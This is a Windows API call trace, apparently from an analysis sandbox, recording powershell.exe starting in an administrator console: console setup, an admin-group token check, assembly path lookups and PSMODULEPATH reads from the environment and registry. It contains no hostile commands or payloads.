	[0222.528] GetLastError () returned 0xcb
	[0222.535] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xf
	[0222.629] GetLastError () returned 0x0
	[0222.631] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x29e7a4 | out: lpConsoleScreenBufferInfo=0x29e7a4) returned 1
	[0222.631] GetLastError () returned 0x0
	[0222.637] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13
	[0222.637] GetLastError () returned 0x0
	[0222.637] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x13, lpConsoleScreenBufferInfo=0x29e7a4 | out: lpConsoleScreenBufferInfo=0x29e7a4) returned 1
	[0222.637] GetLastError () returned 0x0
	[0222.638] GetVersionExW (in: lpVersionInformation=0x7a42a0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x7a42a0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0222.638] GetLastError () returned 0x0
	[0222.639] GetCurrentProcess () returned 0xffffffff
	[0222.639] GetLastError () returned 0x3f0
	[0222.641] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x29e7b4 | out: TokenHandle=0x29e7b4*=0x354) returned 1
	[0222.641] GetLastError () returned 0x3f0
	[0222.644] GetTokenInformation (in: TokenHandle=0x354, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x29e80c | out: TokenInformation=0x0, ReturnLength=0x29e80c) returned 0
	[0222.644] GetLastError () returned 0x7a
	[0222.646] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x788e38
	[0222.646] GetLastError () returned 0x7a
	[0222.646] GetTokenInformation (in: TokenHandle=0x354, TokenInformationClass=0x8, TokenInformation=0x788e38, TokenInformationLength=0x4, ReturnLength=0x29e80c | out: TokenInformation=0x788e38, ReturnLength=0x29e80c) returned 1
	[0222.646] GetLastError () returned 0x7a
	[0222.649] DuplicateTokenEx (in: hExistingToken=0x354, dwDesiredAccess=0x8, lpTokenAttributes=0x0, ImpersonationLevel=0x2, TokenType=0x2, phNewToken=0x29e7c4 | out: phNewToken=0x29e7c4*=0x34c) returned 1
	[0222.649] GetLastError () returned 0x7f
	[0222.649] GetTokenInformation (in: TokenHandle=0x354, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x29e80c | out: TokenInformation=0x0, ReturnLength=0x29e80c) returned 0
	[0222.650] GetLastError () returned 0x7a
	[0222.650] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x788e18
	[0222.650] GetLastError () returned 0x7a
	[0222.650] GetTokenInformation (in: TokenHandle=0x354, TokenInformationClass=0x8, TokenInformation=0x788e18, TokenInformationLength=0x4, ReturnLength=0x29e80c | out: TokenInformation=0x788e18, ReturnLength=0x29e80c) returned 1
	[0222.650] GetLastError () returned 0x7a
	[0222.651] CheckTokenMembership (in: TokenHandle=0x34c, SidToCheck=0x2b5d954*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x29e7a0 | out: IsMember=0x29e7a0) returned 1
	[0222.651] GetLastError () returned 0x7a
	[0222.651] CloseHandle (hObject=0x34c) returned 1
	[0222.651] GetLastError () returned 0x7a
	[0222.651] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x29e2b4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0222.651] GetLastError () returned 0x7a
	[0222.651] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x29e264, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0222.651] GetLastError () returned 0x7a
	[0222.651] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x29e264, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0222.651] GetLastError () returned 0x7a
	[0222.651] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x29e264, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0222.651] GetLastError () returned 0x7a
	[0222.878] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x29e2b4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0222.878] GetLastError () returned 0x7a
	[0222.878] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x29e264, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0222.878] GetLastError () returned 0x7a
	[0222.878] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x29e264, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0222.878] GetLastError () returned 0x7a
	[0222.882] GetConsoleTitleW (in: lpConsoleTitle=0x7a4a48, nSize=0x400 | out: lpConsoleTitle="Administrator: C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x48
	[0222.883] GetLastError () returned 0x7a
	[0222.902] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x29e2e4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0222.902] GetLastError () returned 0x7a
	[0222.903] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x29e294, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0222.903] GetLastError () returned 0x7a
	[0222.903] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x29e294, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0222.903] GetLastError () returned 0x7a
	[0222.903] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x29e294, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0222.903] GetLastError () returned 0x7a
	[0223.021] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x29e2e4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0223.021] GetLastError () returned 0x7a
	[0223.021] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x29e294, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0223.021] GetLastError () returned 0x7a
	[0223.021] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x29e294, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0223.021] GetLastError () returned 0x7a
	[0223.021] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x29e2e4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0223.021] GetLastError () returned 0x7a
	[0223.021] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x29e294, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0223.021] GetLastError () returned 0x7a
	[0223.021] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x29e294, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0223.021] GetLastError () returned 0x7a
	[0223.021] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x29e2f8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0223.021] GetLastError () returned 0x7a
	[0223.021] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x29e2a8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0223.022] GetLastError () returned 0x7a
	[0223.022] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x29e2a8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0223.022] GetLastError () returned 0x7a
	[0223.022] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x29e2a8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0223.022] GetLastError () returned 0x7a
	[0223.166] SetConsoleCtrlHandler (HandlerRoutine=0x297384a, Add=1) returned 1
	[0223.166] GetLastError () returned 0x7a
	[0223.177] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x7a4288, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0223.177] GetLastError () returned 0xcb
	[0223.187] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x34c
	[0223.187] GetLastError () returned 0x0
	[0223.188] CoCreateGuid (in: pguid=0x29e7d8 | out: pguid=0x29e7d8*(Data1=0x9efa0123, Data2=0x3378, Data3=0x49c7, Data4=([0]=0xb0, [1]=0x7e, [2]=0xc2, [3]=0x47, [4]=0x16, [5]=0x7a, [6]=0x1e, [7]=0x28))) returned 0x0
	[0223.291] WinSqmIsOptedIn () returned 0x0
	[0223.292] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x7a4288, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0223.292] GetLastError () returned 0xcb
	[0223.294] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x7a4288, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0223.294] GetLastError () returned 0xcb
	[0223.294] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x7a4288, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0223.295] GetLastError () returned 0xcb
	[0223.295] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x7a4288, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0223.295] GetLastError () returned 0xcb
	[0223.296] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x7a4288, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0223.296] GetLastError () returned 0xcb
	[0223.297] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x7a4288, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0223.297] GetLastError () returned 0xcb
	[0223.298] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x7a4288, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0223.298] GetLastError () returned 0xcb
	[0223.299] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x7a4288, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0223.299] GetLastError () returned 0xcb
	[0223.304] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x7a4288, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0223.304] GetLastError () returned 0xcb
	[0223.321] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x7a4288, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0223.321] GetLastError () returned 0xcb
	[0223.325] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x7a4288, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0223.325] GetLastError () returned 0xcb
	[0223.325] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x7a4288, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0223.325] GetLastError () returned 0xcb
	[0224.203] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29e030, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0224.203] GetLastError () returned 0xcb
	[0224.204] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29dfe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0224.204] GetLastError () returned 0xcb
	[0224.204] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29dfe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0224.204] GetLastError () returned 0xcb
	[0224.204] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29dfe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0224.204] GetLastError () returned 0xcb
	[0224.231] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29e030, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0224.231] GetLastError () returned 0x3
	[0224.231] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29dfe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0224.231] GetLastError () returned 0x3
	[0224.231] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29dfe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0224.231] GetLastError () returned 0x3
	[0224.231] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29e030, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0224.231] GetLastError () returned 0x3
	[0224.231] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29dfe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0224.231] GetLastError () returned 0x3
	[0224.231] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29dfe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0224.231] GetLastError () returned 0x3
	[0224.232] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29e030, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0224.232] GetLastError () returned 0x3
	[0224.232] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29dfe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0224.232] GetLastError () returned 0x3
	[0224.232] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29dfe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0224.232] GetLastError () returned 0x3
	[0224.232] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29e030, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0224.232] GetLastError () returned 0x3
	[0224.232] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29dfe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0224.232] GetLastError () returned 0x3
	[0224.232] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29dfe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0224.232] GetLastError () returned 0x3
	[0224.234] GetEnvironmentVariableW (in: lpName="PSMODULEPATH", lpBuffer=0x7a4288, nSize=0x80 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x75
	[0224.234] GetLastError () returned 0x3
	[0224.234] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x7a4288, nSize=0x64 | out: lpDst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShe") returned 0x76
	[0224.235] GetLastError () returned 0x3
	[0224.235] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x7a4288, nSize=0x76 | out: lpDst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x76
	[0224.235] GetLastError () returned 0x3
	[0224.235] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x29e5f0 | out: phkResult=0x29e5f0*=0x358) returned 0x0
	[0224.329] RegQueryValueExW (in: hKey=0x358, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x29e634, lpData=0x0, lpcbData=0x29e630*=0x0 | out: lpType=0x29e634*=0x2, lpData=0x0, lpcbData=0x29e630*=0x6c) returned 0x0
	[0224.329] RegQueryValueExW (in: hKey=0x358, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x29e634, lpData=0x7a4288, lpcbData=0x29e630*=0x6c | out: lpType=0x29e634*=0x2, lpData="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpcbData=0x29e630*=0x6c) returned 0x0
	[0224.329] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%", lpDst=0x7a4288, nSize=0x64 | out: lpDst="C:\\Windows") returned 0xb
	[0224.329] GetLastError () returned 0x3
	[0224.330] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x7a4288, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0224.330] GetLastError () returned 0x3
